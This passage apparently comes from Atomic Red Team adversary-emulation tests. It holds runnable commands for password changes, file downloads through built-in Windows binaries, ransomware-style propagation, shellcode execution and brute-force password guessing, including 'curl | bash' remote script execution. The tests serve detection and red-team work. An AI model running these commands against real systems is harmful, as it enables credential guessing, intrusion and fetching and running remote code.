  Write-Host -ForegroundColor Cyan "Successfully changed the password to Uplow-1"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "Uplow-1" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Number in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "UpperLowerLong-special") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString UpperLowerLong-special -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to UpperLowerLong-special"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UpperLowerLong-special" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Special Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "UpperLowerLong333noSpecialChar") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString UpperLowerLong333noSpecialChar -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to UpperLowerLong333noSpecialChar"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UpperLowerLong333noSpecialChar" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Uppercase Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "lower-long-special-333") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString lower-long-special-333 -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to lower-long-special-333"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "lower-long-special-333" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Lowercase Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "UPPER-LONG-SPECIAL-333") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString UPPER-LONG-SPECIAL-333 -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to UPPER-LONG-SPECIAL-333"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UPPER-LONG-SPECIAL-333" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: Only Two Character Classes
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "onlyUPandLowChars") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString onlyUPandLowChars -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to onlyUPandLowChars"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "onlyUPandLowChars" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: Common Password Use
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "Spring$((Get-Date).Year)!") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString Spring$((Get-Date).Year)! -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
  Write-Host -ForegroundColor Cyan "Successfully changed the password to Spring$((Get-Date).Year)!"
  $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "Spring$((Get-Date).Year)!" -AsPlainText -Force))
  $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
} else {
  Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}
Description: Attempt to change the password of the current domain user in order to check the password policy. Ideally, you would only run this atomic test to verify that your password policy blocks the new password.
If the password is successfully changed, the credential file is updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing; however, the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
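The seven policy-check atomics above each burn a real password change to learn one fact about the domain policy. The following is an added example, not Atomic Red Team code, that evaluates the same seven candidates offline against the documented Windows "Password must meet complexity requirements" rules (minimum length, no account name or display-name token, three of five character classes), so you know in advance which atomics can fail under the default policy and which only prove anything under a stricter one. The account name, display name and minimum length are constructed sample values.

```powershell
# Added example (not part of Atomic Red Team): evaluate candidate passwords
# against the default Windows complexity rules offline. User values and the
# 7-character minimum (the Windows default) are constructed assumptions.

function Test-PasswordComplexity {
    param(
        [Parameter(Mandatory)][string]$Password,
        [Parameter(Mandatory)][string]$SamAccountName,
        [string]$DisplayName = '',
        [int]$MinLength = 7
    )
    $failures = [System.Collections.Generic.List[string]]::new()

    if ($Password.Length -lt $MinLength) {
        $failures.Add("shorter than $MinLength characters")
    }

    # The sAMAccountName (when 3+ characters) must not appear in the password.
    if ($SamAccountName.Length -ge 3 -and
        $Password.IndexOf($SamAccountName, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
        $failures.Add('contains the account name')
    }

    # Display-name tokens of 3+ characters (split on , . - _ # space tab) are banned too.
    $tokens = $DisplayName -split '[,.\-_# \t]+' | Where-Object { $_.Length -ge 3 }
    foreach ($token in $tokens) {
        if ($Password.IndexOf($token, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
            $failures.Add("contains display-name token '$token'")
            break
        }
    }

    # Three of five character classes are required. -cmatch keeps \p{Lu}/\p{Ll}
    # case-sensitive; the "special" class is approximated as anything that is
    # neither a letter nor a decimal digit.
    $classes = 0
    if ($Password -cmatch '\p{Lu}')               { $classes++ }   # uppercase letters
    if ($Password -cmatch '\p{Ll}')               { $classes++ }   # lowercase letters
    if ($Password -match  '\p{Nd}')               { $classes++ }   # decimal digits
    if ($Password -match  '[^\p{L}\p{Nd}]')       { $classes++ }   # special characters
    if ($Password -cmatch '[\p{Lo}\p{Lt}\p{Lm}]') { $classes++ }   # other Unicode letters
    if ($classes -lt 3) {
        $failures.Add("only $classes of 5 character classes")
    }

    [pscustomobject]@{
        Password = $Password
        Passes   = ($failures.Count -eq 0)
        Reasons  = ($failures -join '; ')
    }
}

# The seven candidates used by the tests above, checked for a constructed user.
$candidates = @(
    'Uplow-1', 'UpperLowerLong-special', 'UpperLowerLong333noSpecialChar',
    'lower-long-special-333', 'UPPER-LONG-SPECIAL-333', 'onlyUPandLowChars',
    "Spring$((Get-Date).Year)!"
)
$candidates | ForEach-Object {
    Test-PasswordComplexity -Password $_ -SamAccountName 'jdoe' -DisplayName 'Doe, John'
} | Format-Table -AutoSize
```

With the Windows defaults (complexity enabled, minimum length 7) only onlyUPandLowChars fails; Uplow-1 is exactly seven characters with four classes, and every other candidate has three classes. In other words, the "Short Password" atomic only proves something if the domain enforces a longer minimum, and the "Common Password Use" atomic can only be blocked by a banned-password list such as Entra Password Protection, which no offline check reproduces. Where the RSAT ActiveDirectory module is available, feed the real values in with `(Get-ADDefaultDomainPasswordPolicy).MinPasswordLength` and check `Get-ADFineGrainedPasswordPolicy` for a PSO that overrides it for the test account.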
T1098 - Account Manipulation
GCP - Delete Service Account Key
gcloud config set project atomic-test-1
KEY=`gcloud iam service-accounts keys list --iam-account=atomic-service-account@atomic-test-1.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
gcloud iam service-accounts keys delete $KEY --iam-account=atomic-service-account@atomic-test-1.iam.gserviceaccount.com --quiet
Description: This Atomic will:
- Create a service account
- Create a service account key
- Store the ID of a single key for that service account in a variable
- Pass that variable to the key deletion command
- Delete the service account
The idea for this Atomic came from a Rule published by the Elastic team.
Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP).
Each service account is associated with two sets of public/private RSA key pairs that are used to authenticate.
If a key is deleted, the application will no longer be able to access Google Cloud resources using that key. A security best practice is to rotate your service account keys regularly.
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Prereq: Check if terraform is installed.
terraform version
Prereq: Create dependency resources using terraform
stat "$T1098/src/T1098-17/terraform.tfstate"
Cleanup:
cd "$T1098/src/T1098-17/"
terraform state rm google_service_account_key.key
terraform destroy -auto-approve
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\Atomic-license.txt
Description: This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
pushd \\localhost\C$
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
Description: OSTap copies itself in a specific way to shares and secondary drives. This emulates that activity.
Description: svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
Cleanup:
del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1
T1105 - Ingress Tool Transfer
Download a File with Windows Defender MpCmdRun.exe
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path %temp%\Atomic-license.txt
Description: Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Prereq: Must have a Windows Defender version with MpCmdRun.exe installed
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /? >nul 2>&1
Cleanup:
del %temp%\Atomic-license.txt >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
T1105 - Ingress Tool Transfer
whois file download
timeout --preserve-status 1 whois -h localhost -p 8443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out
Description: Download a remote file using the whois utility
Prereq: The whois and timeout commands must be present
Description: Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
T1105 - Ingress Tool Transfer
File download with finger.exe on Windows
finger base64_filedata@localhost
Description: Simulate a file download using finger.exe. The test connects to localhost by default; use the custom input argument to have finger connect to an external server instead.
Because the default target is localhost, do not expect a successful connection; the point is the process and network activity that finger.exe generates.
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
Description: Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]..
Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
Description: The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
Cleanup:
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
Description: The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
Expected output will include whether the file uploaded successfully or not.
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
Prereq: A file must be created to upload
if (Test-Path c:\temp\atomictestfile.txt) {exit 0} else {exit 1}
T1105 - Ingress Tool Transfer
Download a file with Microsoft Connection Manager Auto-Download
"T1105\src\T1105.bat" 1>NUL
Description: Uses cmdl32 to download an arbitrary file from the internet. cmdl32 is allowed to install the profile used to launch a VPN connection; the config is modified so that it downloads the arbitrary file instead.
cmdl32.exe would normally detect that the downloaded file is not a VPN server profile and delete it; the test avoids this by pointing TMP at a temporary folder and denying the user the delete permission on all files in it.
Upon successful execution the test opens the Calculator and Notepad executables for 10 seconds.
reference:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
Prereq: T1105\src\T1105.bat must exist on system.
if (Test-Path "T1105\src\T1105.bat") {exit 0} else {exit 1}
Cleanup:
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
Description: This test simulates MAZE ransomware's propagation script, which searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one.
Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
Prereq: Binary file must exist at specified location ($env:comspec)
if (Test-Path $env:comspec) {exit 0} else {exit 1}
Prereq: Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
if (Test-Path "..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
Cleanup:
if (test-path "..\ExternalPayloads\T1105CompletedHosts.txt") {
  foreach ($machine in get-content -path "..\ExternalPayloads\T1105CompletedHosts.txt") {
    wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
    Remove-Item -path "\\$machine\C$\Windows\Temp\T1105.exe" -force -erroraction silentlycontinue
  }
}
Remove-Item -path "..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
T1105 - Ingress Tool Transfer
Printer Migration Command-Line Tool UNC share folder into a zip file
del %TEMP%\PrintBrm.zip >nul 2>&1
C:\Windows\System32\spool\tools\PrintBrm.exe -b -d \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ -f %TEMP%\PrintBrm.zip -O FORCE
Description: Create a ZIP file from a folder in a remote drive
Cleanup:
del %TEMP%\PrintBrm.zip >nul 2>&1
T1105 - Ingress Tool Transfer
Lolbas replace.exe use to copy file
del %TEMP%\redcanary.cab >nul 2>&1
C:\Windows\System32\replace.exe "T1105\src\redcanary.cab" %TEMP% /A
Description: Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Prereq: T1105\src\redcanary.cab must exist on system.
if (Test-Path "T1105\src\redcanary.cab") {exit 0} else {exit 1}
Cleanup:
del %TEMP%\redcanary.cab >nul 2>&1
T1105 - Ingress Tool Transfer
Lolbas replace.exe use to copy UNC file
del %TEMP%\redcanary.cab >nul 2>&1
C:\Windows\System32\replace.exe \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab %TEMP% /A
Description: Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Description: GUP is an open source, signed binary used by Notepad++ for software updates, and can be used to download arbitrary files (.zip) from the internet/GitHub.
[Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
Upon execution, a sample zip file is downloaded to the C:\Temp\Sample folder.
Prereq: Gup.exe binary must exist on disk at specified location (T1105\bin\GUP.exe)
if (Test-Path "T1105\bin\GUP.exe") {exit 0} else {exit 1}
Description: The Windows package 'Sqlcmd.exe' can be abused to download malicious files from C2 servers.
This Atomic exhibits the same behaviour by downloading a sample zip file from the src directory of this technique folder via a GitHub URL.
Prereq: The Windows package 'Sqlcmd' needs to be available on the machine for this atomic to execute successfully
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
Description: Copy a staged file using PSCP.exe to a public target location.
Prereq: pscp.exe must be available on the system.
if (Test-Path ..\ExternalPayloads\pscp.exe) {exit 0} else {exit 1}
Cleanup:
del /f /q C:\Temp\T1105_scp.zip
T1105 - Ingress Tool Transfer
Windows push file using scp.exe
# Check if the folder exists, create it if it doesn't
$folderPath = "C:\temp"
if (-Not (Test-Path -Path $folderPath)) {
  New-Item -Path $folderPath -ItemType Directory
}
Description: This test simulates pulling files using SFTP on a Windows environment.
Prereq: This test requires the `sftp` command to be available on the system.
if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." exit 1 }
T1105 - Ingress Tool Transfer
Download a file with OneDrive Standalone Updater
if (-not (Test-Path "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe")) {
  Write-Host "OneDriveStandaloneUpdater.exe not found at C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe. Test cannot continue."
  exit 1
}
# Run OneDrive Standalone Updater
& "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"
Description: Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
This technique can be used to download files without executing anomalous executables.
Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
Prereq: OneDriveStandaloneUpdater.exe must exist on disk at specified location
if (Test-Path "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe") {exit 0} else {exit 1}
Description: Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
against a target URL. The pod is automatically deleted after execution.
Description: Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn
T1106 - Native API
Run Shellcode via Syscall in Go
$T1106\bin\x64\syscall.exe -debug
Description: Runs shellcode in the current running process via a syscall.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Use syscall to execute the entrypoint of the shellcode
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
$passwordList = Get-Content -Path "T1110.001\src\passwords.txt"
foreach ($password in $passwordList) {
  $credz = new-object System.Net.NetworkCredential("$ENV:USERNAME", $password, "$env:UserDnsDomain")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
  try {
    Write-Host " [-] Attempting ${password} on account $ENV:USERNAME."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] $ENV:USERNAME:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of bruteforce"
Description: Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos
T1110.001 - Brute Force: Password Guessing
Brute Force Credentials of single Azure AD user
Import-Module -Name AzureAD
$passwords = "Password1`n1q2w3e4r`nPassword!".split("{`n}")
foreach($password in $passwords) {
  $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "bruce.wayne@contoso.com", $Pword
  try {
    Write-Host " [-] Attempting ${password} on account bruce.wayne@contoso.com."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n"
    break
  } catch {
    Write-Host " [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n"
  }
}
Write-Host "End of bruteforce"
Description: Attempt to brute force Azure AD user via AzureAD powershell module.
cd "..\ExternalPayloads"
.\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\bruteuser.txt TestUser1
Description: Bruteforce a single user's password from a wordlist
Prereq: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Prereq: bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\bruteuser.txt"){exit 0} else {exit 1}
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - Debian
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su -c "cd /tmp; curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh | bash" art
Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, and then deletes the user.
Prereq: Check if running on a Debian based machine.
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
userdel -fr art
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - Redhat
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh | bash
